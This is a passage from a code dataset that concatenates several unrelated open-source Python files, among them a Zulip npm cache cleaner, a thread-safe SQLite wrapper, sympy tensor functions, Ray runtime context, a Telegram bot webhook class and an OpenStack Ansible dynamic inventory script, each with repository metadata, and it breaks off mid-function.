| 3,800,890,605,192,939,000
| 32.527076
| 113
| 0.582535
| false
| 3.501885
| false
| false
| false
|
jackrzhang/zulip
|
scripts/lib/clean_node_cache.py
|
1
|
2324
|
#!/usr/bin/env python3
import argparse
import os
import subprocess
import sys
if False:
from typing import Set
ZULIP_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(ZULIP_PATH)
from scripts.lib.node_cache import generate_sha1sum_node_modules
from scripts.lib.zulip_tools import get_caches_to_be_purged, \
get_environment, get_recent_deployments, parse_cache_script_args, \
purge_unused_caches
ENV = get_environment()
NODE_MODULES_CACHE_PATH = "/srv/zulip-npm-cache"
if ENV == "travis":
NODE_MODULES_CACHE_PATH = os.path.join(os.environ["HOME"], "zulip-npm-cache")
try:
subprocess.check_output(["/home/travis/zulip-yarn/bin/yarn", '--version'])
except OSError:
print('yarn not found. Most probably we are running static-analysis and '
'hence yarn is not installed. Exiting without cleaning npm cache.')
sys.exit(0)
def get_caches_in_use(threshold_days):
# type: (int) -> Set[str]
setups_to_check = set([ZULIP_PATH, ])
caches_in_use = set()
if ENV == "prod":
setups_to_check |= get_recent_deployments(threshold_days)
if ENV == "dev":
# In dev always include the currently active cache in order
# not to break current installation in case dependencies
# are updated with bumping the provision version.
CURRENT_CACHE = os.path.dirname(os.path.realpath(os.path.join(ZULIP_PATH, "node_modules")))
caches_in_use.add(CURRENT_CACHE)
for setup_dir in setups_to_check:
node_modules_link_path = os.path.join(setup_dir, "node_modules")
if not os.path.islink(node_modules_link_path):
# If 'package.json' file doesn't exist then no node_modules
# cache is associated with this setup.
continue
# The actual cache path doesn't include the /node_modules
caches_in_use.add(os.path.dirname(os.readlink(node_modules_link_path)))
return caches_in_use
def main(args: argparse.Namespace) -> None:
caches_in_use = get_caches_in_use(args.threshold_days)
purge_unused_caches(
NODE_MODULES_CACHE_PATH, caches_in_use, "node modules cache", args)
if __name__ == "__main__":
args = parse_cache_script_args("This script cleans unused zulip npm caches.")
main(args)
|
apache-2.0
| 6,640,714,881,982,662,000
| 37.733333
| 99
| 0.673838
| false
| 3.373004
| false
| false
| false
|
MaxMorgenstern/EmeraldAI
|
EmeraldAI/Logic/Database/SQlite3.py
|
1
|
5843
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
from cachetools import cached
from EmeraldAI.Logic.Singleton import Singleton
from EmeraldAI.Logic.Modules import Global
from EmeraldAI.Config.Config import Config
from EmeraldAI.Logic.Logger import FileLogger
class SQlite3(object):
__metaclass__ = Singleton
__Database = None
def __init__(self):
self.__Database = self.GetDB(Config().Get("Database", "SQliteDatabase"))
def GetDB(self, database):
return Worker(os.path.join(Global.EmeraldPath, "Data", "SqliteDB", database.rstrip(".sqlite") + ".sqlite"))
@cached(cache={})
def Execute(self, sql, args=None):
return self.ExecuteDB(self.__Database, sql, args)
def ExecuteDB(self, db, sql, args=None):
db.execute(sql, args)
return db.getLastrowid()
@cached(cache={})
def Fetchall(self, sql, args=None):
return self.FetchallDB(self.__Database, sql, args)
def FetchallCacheBreaker(self, sql, args=None):
return self.FetchallDB(self.__Database, sql, args)
def FetchallDB(self, db, sql, args=None):
return db.execute(sql, args)
def Disconnect(self):
self.DisconnectDB(self.__Database)
def DisconnectDB(self, db):
db.close()
###############################################################################
# Copyright (c) 2014 Palantir Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#__author__ = "Shawn Lee"
#__email__ = "dashawn@gmail.com"
#__license__ = "MIT"
#
# Thread safe sqlite3 interface.
import sqlite3
import threading
import uuid
try:
import queue as Queue # module re-named in Python 3
except ImportError:
import Queue
class Worker(threading.Thread):
def __init__(self, file_name, max_queue_size=100):
threading.Thread.__init__(self, name=__name__)
self.daemon = True
self._sqlite3_conn = sqlite3.connect(
file_name, check_same_thread=False,
detect_types=sqlite3.PARSE_DECLTYPES)
self._sqlite3_conn.text_factory = str
self._sqlite3_cursor = self._sqlite3_conn.cursor()
self._sql_queue = Queue.Queue(maxsize=max_queue_size)
self._results = {}
self._max_queue_size = max_queue_size
self._select_events = {}
self._close_event = threading.Event()
self._close_lock = threading.Lock()
self.start()
def run(self):
execute_count = 0
for token, query, values in iter(self._sql_queue.get, None):
if query:
self._run_query(token, query, values)
execute_count += 1
if (self._sql_queue.empty() or
execute_count == self._max_queue_size):
self._sqlite3_conn.commit()
execute_count = 0
if self._close_event.is_set() and self._sql_queue.empty():
self._sqlite3_conn.commit()
self._sqlite3_conn.close()
return
def _run_query(self, token, query, values):
if query.lower().strip().startswith("select"):
try:
self._sqlite3_cursor.execute(query, values)
self._results[token] = self._sqlite3_cursor.fetchall()
except sqlite3.Error as err:
self._results[token] = (
"Query returned error: %s: %s: %s" % (query, values, err))
finally:
self._select_events.setdefault(token, threading.Event())
self._select_events[token].set()
else:
try:
self._sqlite3_cursor.execute(query, values)
except sqlite3.Error as err:
# TODO
print err
def close(self):
with self._close_lock:
if not self.is_alive():
return "Already Closed"
self._close_event.set()
self._sql_queue.put(("", "", ""), timeout=5)
self.join()
@property
def queue_size(self):
return self._sql_queue.qsize()
def _query_results(self, token):
try:
self._select_events.setdefault(token, threading.Event())
self._select_events[token].wait()
return self._results[token]
finally:
self._select_events[token].clear()
del self._results[token]
del self._select_events[token]
def execute(self, query, values=None):
if self._close_event.is_set():
return "Close Called"
values = values or []
token = str(uuid.uuid4())
self._sql_queue.put((token, query, values), timeout=5)
if query.lower().strip().startswith("select"):
return self._query_results(token)
def getLastrowid(self):
return self._sqlite3_cursor.lastrowid
|
apache-2.0
| -8,573,672,131,020,047,000
| 33.988024
| 115
| 0.608249
| false
| 4.032436
| false
| false
| false
|
basho-labs/riak-mesos-tools
|
setup.py
|
1
|
4313
|
#
# Copyright (C) 2016 Basho Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages
from codecs import open
from os import path
from riak_mesos import constants
here = path.abspath(path.dirname(__file__))
# Get the long description from the relevant file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='riak-mesos',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version=constants.version,
description='Riak Mesos Command Line Interface',
long_description=long_description,
# The project's main homepage.
url='https://github.com/basho-labs/riak-mesos-tools',
# Author details
author='Basho Technologies, Inc.',
author_email='support@basho.com',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: TODO: License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
# What does your project relate to?
keywords='dcos command riak database mesosphere',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[
'docopt',
'dcos>=0.4.6,<0.4.12',
'kazoo',
'click',
'futures'
],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax, for
# example:
# $ pip install -e .[dev,test]
extras_require={
'dev': ['check-manifest'],
'test': ['coverage'],
},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
package_data={},
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages.
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[('my_data', ['data/data_file'])],
data_files=[],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'riak-mesos=riak_mesos.cli:cli'
],
},
)
|
apache-2.0
| 3,413,416,331,684,066,300
| 34.941667
| 79
| 0.663112
| false
| 4.061205
| false
| false
| false
|
fperez/sympy
|
sympy/functions/special/tensor_functions.py
|
1
|
1178
|
from sympy.core.function import Function
from sympy.core import sympify, S
from sympy.utilities.decorator import deprecated
###############################################################################
###################### Kronecker Delta, Levi-Civita etc. ######################
###############################################################################
class Dij(Function):
"""
Represents the Kronecker Delta Function
if i == j, Dij(i, j) = 1
otherwise Dij(i, j) = 0
where i, j are usually integers
"""
nargs = (1, 2)
@classmethod
def eval(cls, i, j=0):
i, j = map(sympify, (i, j))
if i == j:
return S.One
elif i.is_number and j.is_number:
return S.Zero
class Eijk(Function):
"""
Represents the Levi-Civita symbol (antisymmetric symbol)
"""
nargs = 3
@classmethod
def eval(cls, i, j, k):
i, j, k = map(sympify, (i, j, k))
if (i,j,k) in [(1,2,3), (2,3,1), (3,1,2)]:
return S.One
elif (i,j,k) in [(1,3,2), (3,2,1), (2,1,3)]:
return S.NegativeOne
elif i==j or j==k or k==i:
return S.Zero
|
bsd-3-clause
| -3,756,714,093,554,926,600
| 27.731707
| 79
| 0.44652
| false
| 3.526946
| false
| false
| false
|
ryanvarley/ExoData
|
exodata/astroquantities.py
|
1
|
1806
|
""" Temp module until astro units are added to quantities
"""
from quantities import *
L_s = solar_luminosity = UnitQuantity(
'solar_luminosity',
3.839*(10**26)*W,
symbol='L_s',
)
L_s.latex_symbol = 'L_\odot'
R_s = solar_radius = UnitLength(
'solar_radius',
6.995 * (10**8) * m,
aliases=['solar_radii'],
symbol='R_s',
)
R_s.latex_symbol = 'R_\odot'
R_e = earth_radius = UnitLength(
'earth_radius',
6.371 * (10**6) * m,
aliases=['earth_radii'],
symbol='R_e',
)
R_e.latex_symbol = 'R_\oplus'
R_j = jupiter_radius = UnitLength(
'jupiter_radius',
6.9911 * (10**7) * m,
aliases=['jupiter_radii'],
symbol='R_j',
)
R_j.latex_symbol = 'R_J'
M_s = solar_mass = UnitMass(
'solar_mass', 1.99*(10**30)*kg,
aliases=['solar_masses'],
symbol='M_s',
)
M_s.latex_symbol = 'M_\odot'
M_e = earth_mass = UnitMass(
'earth_mass', 5.97219*(10**24)*kg,
aliases=['earth_masses'],
symbol='M_e',
)
M_e.latex_symbol = 'M_\oplus'
M_j = jupiter_mass = UnitMass(
'jupiter_mass', 1.8986*(10**27)*kg,
aliases=['jupiter_masses'],
symbol='M_j',
)
M_j.latex_symbol = 'M_J'
Gyear = giga_year = UnitTime(
'giga_year', 10**9*year,
symbol='Gyr',
)
JulianDay = julian_day = JD = UnitTime(
'julian_day', day,
symbol='JD',
)
""" Note while quantities doesnt directly support units with an offset in most cases Julian Days are treated like days.
It is useful then to know if your working in Julian Days, MJD, BJD etc"""
ModifiedJulianDate = modified_julian_day = MJD = UnitTime(
'modified_julian_day', day,
symbol='MJD',
)
# Compound Units
gcm3 = CompoundUnit('g /cm**3')
gcm3.latex_symbol = 'g/cm^3'
kgm3 = CompoundUnit('kg /m**3')
kgm3.latex_symbol = 'kg/m^3'
ms2 = CompoundUnit('m/s**2')
ms2.latex_symbol = 'm/s^2'
|
mit
| 8,007,810,740,782,752,000
| 21.036585
| 119
| 0.609081
| false
| 2.443843
| false
| false
| false
|
richardliaw/ray
|
python/ray/runtime_context.py
|
1
|
4842
|
import ray.worker
import logging
logger = logging.getLogger(__name__)
class RuntimeContext(object):
"""A class used for getting runtime context."""
def __init__(self, worker):
assert worker is not None
self.worker = worker
def get(self):
"""Get a dictionary of the current_context.
For fields that are not available (for example actor id inside a task)
won't be included in the field.
Returns:
dict: Dictionary of the current context.
"""
context = {
"job_id": self.job_id,
"node_id": self.node_id,
"task_id": self.task_id,
"actor_id": self.actor_id
}
# Remove fields that are None.
return {
key: value
for key, value in context.items() if value is not None
}
@property
def job_id(self):
"""Get current job ID for this worker or driver.
Job ID is the id of your Ray drivers that create tasks or actors.
Returns:
If called by a driver, this returns the job ID. If called in
a task, return the job ID of the associated driver.
"""
job_id = self.worker.current_job_id
assert not job_id.is_nil()
return job_id
@property
def node_id(self):
"""Get current node ID for this worker or driver.
Node ID is the id of a node that your driver, task, or actor runs.
Returns:
a node id for this worker or driver.
"""
node_id = self.worker.current_node_id
assert not node_id.is_nil()
return node_id
@property
def task_id(self):
"""Get current task ID for this worker or driver.
Task ID is the id of a Ray task.
This shouldn't be used in a driver process.
Example:
>>> @ray.remote
>>> class Actor:
>>> def ready(self):
>>> return True
>>>
>>> @ray.remote
>>> def f():
>>> return True
>>>
>>> # All the below code will generate different task ids.
>>> # Task ids are available for actor creation.
>>> a = Actor.remote()
>>> # Task ids are available for actor tasks.
>>> a.ready.remote()
>>> # Task ids are available for normal tasks.
>>> f.remote()
Returns:
The current worker's task id. None if there's no task id.
"""
# only worker mode has actor_id
assert self.worker.mode == ray.worker.WORKER_MODE, (
f"This method is only available when the process is a\
worker. Current mode: {self.worker.mode}")
task_id = self.worker.current_task_id
return task_id if not task_id.is_nil() else None
@property
def actor_id(self):
"""Get the current actor ID in this worker.
ID of the actor of the current process.
This shouldn't be used in a driver process.
Returns:
The current actor id in this worker. None if there's no actor id.
"""
# only worker mode has actor_id
assert self.worker.mode == ray.worker.WORKER_MODE, (
f"This method is only available when the process is a\
worker. Current mode: {self.worker.mode}")
actor_id = self.worker.actor_id
return actor_id if not actor_id.is_nil() else None
@property
def was_current_actor_reconstructed(self):
"""Check whether this actor has been restarted
Returns:
Whether this actor has been ever restarted.
"""
assert not self.actor_id.is_nil(), (
"This method should't be called inside Ray tasks.")
actor_info = ray.state.actors(self.actor_id.hex())
return actor_info and actor_info["NumRestarts"] != 0
@property
def current_placement_group_id(self):
"""Get the current Placement group ID of this worker.
Returns:
The current placement group id of this worker.
"""
return self.worker.placement_group_id
@property
def should_capture_child_tasks_in_placement_group(self):
"""Get if the current task should capture parent's placement group.
This returns True if it is called inside a driver.
Returns:
Return True if the current task should implicitly
capture the parent placement group.
"""
return self.worker.should_capture_child_tasks_in_placement_group
_runtime_context = None
def get_runtime_context():
global _runtime_context
if _runtime_context is None:
_runtime_context = RuntimeContext(ray.worker.global_worker)
return _runtime_context
|
apache-2.0
| -9,188,469,718,043,545,000
| 29.840764
| 78
| 0.57311
| false
| 4.39782
| false
| false
| false
|
andy-z/ged4py
|
docs/example_code/example3.py
|
1
|
1988
|
import sys
from ged4py.parser import GedcomReader
from ged4py.date import DateValueVisitor
class DateFormatter(DateValueVisitor):
"""Visitor class that produces string representation of dates.
"""
def visitSimple(self, date):
return f"{date.date}"
def visitPeriod(self, date):
return f"from {date.date1} to {date.date2}"
def visitFrom(self, date):
return f"from {date.date}"
def visitTo(self, date):
return f"to {date.date}"
def visitRange(self, date):
return f"between {date.date1} and {date.date2}"
def visitBefore(self, date):
return f"before {date.date}"
def visitAfter(self, date):
return f"after {date.date}"
def visitAbout(self, date):
return f"about {date.date}"
def visitCalculated(self, date):
return f"calculated {date.date}"
def visitEstimated(self, date):
return f"estimated {date.date}"
def visitInterpreted(self, date):
return f"interpreted {date.date} ({date.phrase})"
def visitPhrase(self, date):
return f"({date.phrase})"
format_visitor = DateFormatter()
with GedcomReader(sys.argv[1]) as parser:
# iterate over each INDI record in a file
for i, indi in enumerate(parser.records0("INDI")):
print(f"{i}: {indi.name.format()}")
# get all possible event types and print their dates,
# full list of events is longer, this is only an example
events = indi.sub_tags("BIRT", "CHR", "DEAT", "BURI", "ADOP", "EVEN")
for event in events:
date = event.sub_tag_value("DATE")
# Some event types like generic EVEN can define TYPE tag
event_type = event.sub_tag_value("TYPE")
# pass a visitor to format the date
if date:
date_str = date.accept(format_visitor)
else:
date_str = "N/A"
print(f" event: {event.tag} date: {date_str} type: {event_type}")
|
mit
| 2,323,925,988,355,210,000
| 29.584615
| 80
| 0.612173
| false
| 3.641026
| false
| false
| false
|
luckydonald/pytgbot
|
pytgbot/webhook.py
|
1
|
5203
|
# -*- coding: utf-8 -*-
from luckydonaldUtils.logger import logging
from pytgbot.bot import Bot
from pytgbot.exceptions import TgApiServerException, TgApiParseException
__author__ = 'luckydonald'
logger = logging.getLogger(__name__)
class Webhook(Bot):
"""
Subclass of Bot, will be returned of a sucessful webhook setting.
Differs with the normal Bot class, as the sending function stores the result to send,
so you can actually get that and return the data on your incomming message.
"""
stored_request = None
def _prepare_request(self, command, query):
"""
:param command: The Url command parameter
:type command: str
:param query: will get json encoded.
:type query: dict
:return:
"""
from luckydonaldUtils.encoding import to_native as n
from pytgbot.api_types.sendable import Sendable
from pytgbot.api_types import as_array
from DictObject import DictObject
import json
params = {}
for key in query.keys():
element = query[key]
if element is not None:
if isinstance(element, Sendable):
params[key] = json.dumps(as_array(element))
else:
params[key] = element
url = self._base_url.format(api_key=n(self.api_key), command=n(command))
return DictObject(url=url, params=params)
# end def
def _do_request(self, url, params=None, files=None, use_long_polling=None, request_timeout=None):
"""
:param url: The complete url to send to
:type url: str
:keyword params: Parameter for that connection
:keyword files: Optional files parameters
:keyword use_long_polling: if it should use long polling.
(see http://docs.python-requests.org/en/latest/api/#requests.Response.iter_content)
:type use_long_polling: bool
:keyword request_timeout: When the request should time out.
:type request_timeout: int
:return: json data received
:rtype: DictObject.DictObject
"""
import requests
r = requests.post(url, params=params, files=files, stream=use_long_polling,
verify=True, timeout=request_timeout)
# No self signed certificates. Telegram should be trustworthy anyway...
from DictObject import DictObject
try:
logger.debug("Response: {}".format(r.json()))
json_data = DictObject.objectify(r.json())
except Exception:
logger.exception("Parsing answer failed.\nRequest: {r!s}\nContent: {r.content}".format(r=r))
raise
# end if
json_data["response"] = r # TODO: does this failes on json lists? Does TG does that?
return json_data
# end def
def _process_response(self, json_data):
# TG should always return an dict, with at least a status or something.
if self.return_python_objects:
if json_data.ok != True:
raise TgApiServerException(
error_code=json_data.error_code if "error_code" in json_data else None,
response=json_data.response if "response" in json_data else None,
description=json_data.description if "description" in json_data else None,
request=r.request
)
# end if not ok
if "result" not in json_data:
raise TgApiParseException('Key "result" is missing.')
# end if no result
return json_data.result
# end if return_python_objects
return json_data
# end def
def do(self, command, files=None, use_long_polling=False, request_timeout=None, **query):
"""
Send a request to the api.
If the bot is set to return the json objects, it will look like this:
```json
{
"ok": bool,
"result": {...},
# optionally present:
"description": "human-readable description of the result",
"error_code": int
}
```
:param command: The Url command parameter
:type command: str
:keyword request_timeout: When the request should time out.
:type request_timeout: int
:keyword files: if it needs to send files.
:keyword use_long_polling: if it should use long polling.
(see http://docs.python-requests.org/en/latest/api/#requests.Response.iter_content)
:type use_long_polling: bool
:param query: will get json encoded.
:return: The json response from the server, or, if `self.return_python_objects` is `True`, a parsed return type.
:rtype: DictObject.DictObject | pytgbot.api_types.receivable.Receivable
"""
params = self._prepare_request(command, query)
r = self._do_request(
params.url, params=params.params,
files=files, stream=use_long_polling, timeout=request_timeout
)
return self._process_response(r)
# end def do
|
gpl-3.0
| 6,613,766,085,546,908,000
| 34.155405
| 120
| 0.596771
| false
| 4.209547
| false
| false
| false
|
schilli/MOPS
|
MOPS/CorrFunction.py
|
1
|
2568
|
# -*- coding: UTF-8 -*-
from __future__ import print_function, division
import numpy as np
class CorrFunction(object):
"""
correlation function data, additional information and manipulation methods
Parameters
----------
corr : (nvec, nframes) array
Correlation functions
std : (nvec, nframes) array
Correlation function standard deviations
error : (nvec, nframes) array
Correlation function standard error of the mean
info : dict
Dictionary with information on correlation functions
"""
def __init__(self, corr=None, std=None, error=None, info=None):
self.corr = corr
self.std = std
self.error = error
if info is not None:
self.resid = info['bondvecinfo']['resid' ]
self.resindex = info['bondvecinfo']['resindex' ]
self.resname = info['bondvecinfo']['resnames' ]
self.atomindex = info['bondvecinfo']['atomindex' ]
self.atomname = info['bondvecinfo']['atomnames' ]
self.element = info['bondvecinfo']['element' ]
self.chain = info['bondvecinfo']['chain' ]
self.bondlength = info['bondvecinfo']['bondlength']
self.bondvec = info['bondvecinfo']['bondvec' ]
self.fitgroup = info['bondvecinfo']['fitgroup' ]
try:
self.fit = info['bondvecinfo']['fit' ]
except KeyError:
self.fit = False
try:
self.S2direct = np.array(info['bondvecinfo']['S2'])
except KeyError:
self.S2direct = None
self.dt = info['bondvecinfo']['dt' ]
self.topfilename = info['topfilename']
self.npzfilename = info['npzfilename']
self.trjfilename = info['trjfilename']
self.frames = info['frames' ]
else:
self.resid = None
self.resindex = None
self.resname = None
self.atomindex = None
self.atomname = None
self.element = None
self.chain = None
self.bondlength = None
self.bondvec = None
self.fitgroup = None
self.fit = None
self.dt = None
self.topfilename = None
self.npzfilename = None
self.trjfilename = None
self.frames = None
|
gpl-3.0
| 2,965,479,022,776,792,600
| 34.666667
| 78
| 0.511682
| false
| 4.323232
| false
| false
| false
|
narfman0/D3OrganDropCalculator
|
calculator.py
|
1
|
1510
|
#!/bin/python
import sys
from math import pow
DEFAULT_TORMENT = 2
DEFAULT_RUNS = 5
#generate pascals triangle
def pascalsTriangle(rows):
for rownum in range (rows):
newValue=1
rlist = [newValue]
for iteration in range (rownum):
newValue = newValue * ( rownum-iteration ) * 1 / ( iteration + 1 )
rlist.append(int(newValue))
return rlist
#p to drop organ given torment level
def pOrganDrop(torment):
return .25+(torment-1)/20.0
#p to drop organ given torment level, iteration, and total iterations
def pOrganDropI(torment, i, total):
psuccess=pow(pOrganDrop(torment), total-i)
pnotsuccess=1
if i > 0:
pnotsuccess=pow(1-pOrganDrop(torment), i)
return psuccess*pnotsuccess
#p to drop organ at given torment/run level
def calculate(torment,runs):
triangle=pascalsTriangle(runs+1)
p=0.0
i=0
for leaf in triangle:
if i < len(triangle)-1:
pi = pOrganDropI(torment, i, runs) * leaf
p += pi
print('pdrop(i):' + str(i) + ' is ' + str(pi) + ' total: ' + str(p))
i+=1
return p
if __name__ == "__main__":
if len(sys.argv) != 3:
print('Usage: ./calculator.py <torment level> <#runs>' +
' using default torment level ' + str(DEFAULT_TORMENT) + ' with ' + str(DEFAULT_RUNS) + ' runs')
torment=DEFAULT_TORMENT
runs=DEFAULT_RUNS
else:
torment=int(sys.argv[1])
runs=int(sys.argv[2])
pdrop=calculate(torment,runs)
print('pdrop for a given organ=' + str(pdrop) + ', pdrop for all three is=' + str(pow(pdrop,3.0)))
|
gpl-2.0
| 294,702,526,321,510,850
| 27.490566
| 100
| 0.653642
| false
| 2.89272
| false
| false
| false
|
anpingli/openshift-ansible
|
playbooks/openstack/inventory.py
|
1
|
8124
|
#!/usr/bin/env python
"""
This is an Ansible dynamic inventory for OpenStack.
It requires your OpenStack credentials to be set in clouds.yaml or your shell
environment.
"""
from __future__ import print_function
from collections import Mapping
import json
import os
import shade
def base_openshift_inventory(cluster_hosts):
'''Set the base openshift inventory.'''
inventory = {}
masters = [server.name for server in cluster_hosts
if server.metadata['host-type'] == 'master']
etcd = [server.name for server in cluster_hosts
if server.metadata['host-type'] == 'etcd']
if not etcd:
etcd = masters
infra_hosts = [server.name for server in cluster_hosts
if server.metadata['host-type'] == 'node' and
server.metadata['sub-host-type'] == 'infra']
app = [server.name for server in cluster_hosts
if server.metadata['host-type'] == 'node' and
server.metadata['sub-host-type'] == 'app']
cns = [server.name for server in cluster_hosts
if server.metadata['host-type'] == 'cns']
nodes = list(set(masters + infra_hosts + app + cns))
dns = [server.name for server in cluster_hosts
if server.metadata['host-type'] == 'dns']
load_balancers = [server.name for server in cluster_hosts
if server.metadata['host-type'] == 'lb']
osev3 = list(set(nodes + etcd + load_balancers))
inventory['cluster_hosts'] = {'hosts': [s.name for s in cluster_hosts]}
inventory['OSEv3'] = {'hosts': osev3}
inventory['masters'] = {'hosts': masters}
inventory['etcd'] = {'hosts': etcd}
inventory['nodes'] = {'hosts': nodes}
inventory['infra_hosts'] = {'hosts': infra_hosts}
inventory['app'] = {'hosts': app}
inventory['glusterfs'] = {'hosts': cns}
inventory['dns'] = {'hosts': dns}
inventory['lb'] = {'hosts': load_balancers}
inventory['localhost'] = {'ansible_connection': 'local'}
return inventory
def get_docker_storage_mountpoints(volumes):
'''Check volumes to see if they're being used for docker storage'''
docker_storage_mountpoints = {}
for volume in volumes:
if volume.metadata.get('purpose') == "openshift_docker_storage":
for attachment in volume.attachments:
if attachment.server_id in docker_storage_mountpoints:
docker_storage_mountpoints[attachment.server_id].append(attachment.device)
else:
docker_storage_mountpoints[attachment.server_id] = [attachment.device]
return docker_storage_mountpoints
def _get_hostvars(server, docker_storage_mountpoints):
ssh_ip_address = server.public_v4 or server.private_v4
hostvars = {
'ansible_host': ssh_ip_address
}
public_v4 = server.public_v4 or server.private_v4
if public_v4:
hostvars['public_v4'] = server.public_v4
hostvars['openshift_public_ip'] = server.public_v4
# TODO(shadower): what about multiple networks?
if server.private_v4:
hostvars['private_v4'] = server.private_v4
hostvars['openshift_ip'] = server.private_v4
# NOTE(shadower): Yes, we set both hostname and IP to the private
# IP address for each node. OpenStack doesn't resolve nodes by
# name at all, so using a hostname here would require an internal
# DNS which would complicate the setup and potentially introduce
# performance issues.
hostvars['openshift_hostname'] = server.metadata.get(
'openshift_hostname', server.private_v4)
hostvars['openshift_public_hostname'] = server.name
if server.metadata['host-type'] == 'cns':
hostvars['glusterfs_devices'] = ['/dev/nvme0n1']
node_labels = server.metadata.get('node_labels')
# NOTE(shadower): the node_labels value must be a dict not string
if not isinstance(node_labels, Mapping):
node_labels = json.loads(node_labels)
if node_labels:
hostvars['openshift_node_labels'] = node_labels
# check for attached docker storage volumes
if 'os-extended-volumes:volumes_attached' in server:
if server.id in docker_storage_mountpoints:
hostvars['docker_storage_mountpoints'] = ' '.join(
docker_storage_mountpoints[server.id])
return hostvars
def build_inventory():
'''Build the dynamic inventory.'''
cloud = shade.openstack_cloud()
# TODO(shadower): filter the servers based on the `OPENSHIFT_CLUSTER`
# environment variable.
cluster_hosts = [
server for server in cloud.list_servers()
if 'metadata' in server and 'clusterid' in server.metadata]
inventory = base_openshift_inventory(cluster_hosts)
for server in cluster_hosts:
if 'group' in server.metadata:
group = server.metadata.get('group')
if group not in inventory:
inventory[group] = {'hosts': []}
inventory[group]['hosts'].append(server.name)
inventory['_meta'] = {'hostvars': {}}
# cinder volumes used for docker storage
docker_storage_mountpoints = get_docker_storage_mountpoints(
cloud.list_volumes())
for server in cluster_hosts:
inventory['_meta']['hostvars'][server.name] = _get_hostvars(
server,
docker_storage_mountpoints)
stout = _get_stack_outputs(cloud)
if stout is not None:
try:
inventory['localhost'].update({
'openshift_openstack_api_lb_provider':
stout['api_lb_provider'],
'openshift_openstack_api_lb_port_id':
stout['api_lb_vip_port_id'],
'openshift_openstack_api_lb_sg_id':
stout['api_lb_sg_id']})
except KeyError:
pass # Not an API load balanced deployment
try:
inventory['OSEv3']['vars'] = _get_kuryr_vars(cloud, stout)
except KeyError:
pass # Not a kuryr deployment
return inventory
def _get_stack_outputs(cloud_client):
"""Returns a dictionary with the stack outputs"""
cluster_name = os.getenv('OPENSHIFT_CLUSTER', 'openshift-cluster')
stack = cloud_client.get_stack(cluster_name)
if stack is None or stack['stack_status'] not in (
'CREATE_COMPLETE', 'UPDATE_COMPLETE'):
return None
data = {}
for output in stack['outputs']:
data[output['output_key']] = output['output_value']
return data
def _get_kuryr_vars(cloud_client, data):
"""Returns a dictionary of Kuryr variables resulting of heat stacking"""
settings = {}
settings['kuryr_openstack_pod_subnet_id'] = data['pod_subnet']
settings['kuryr_openstack_worker_nodes_subnet_id'] = data['vm_subnet']
settings['kuryr_openstack_service_subnet_id'] = data['service_subnet']
settings['kuryr_openstack_pod_sg_id'] = data['pod_access_sg_id']
settings['kuryr_openstack_pod_project_id'] = (
cloud_client.current_project_id)
settings['kuryr_openstack_auth_url'] = cloud_client.auth['auth_url']
settings['kuryr_openstack_username'] = cloud_client.auth['username']
settings['kuryr_openstack_password'] = cloud_client.auth['password']
if 'user_domain_id' in cloud_client.auth:
settings['kuryr_openstack_user_domain_name'] = (
cloud_client.auth['user_domain_id'])
else:
settings['kuryr_openstack_user_domain_name'] = (
cloud_client.auth['user_domain_name'])
# FIXME(apuimedo): consolidate kuryr controller credentials into the same
# vars the openstack playbook uses.
settings['kuryr_openstack_project_id'] = cloud_client.current_project_id
if 'project_domain_id' in cloud_client.auth:
settings['kuryr_openstack_project_domain_name'] = (
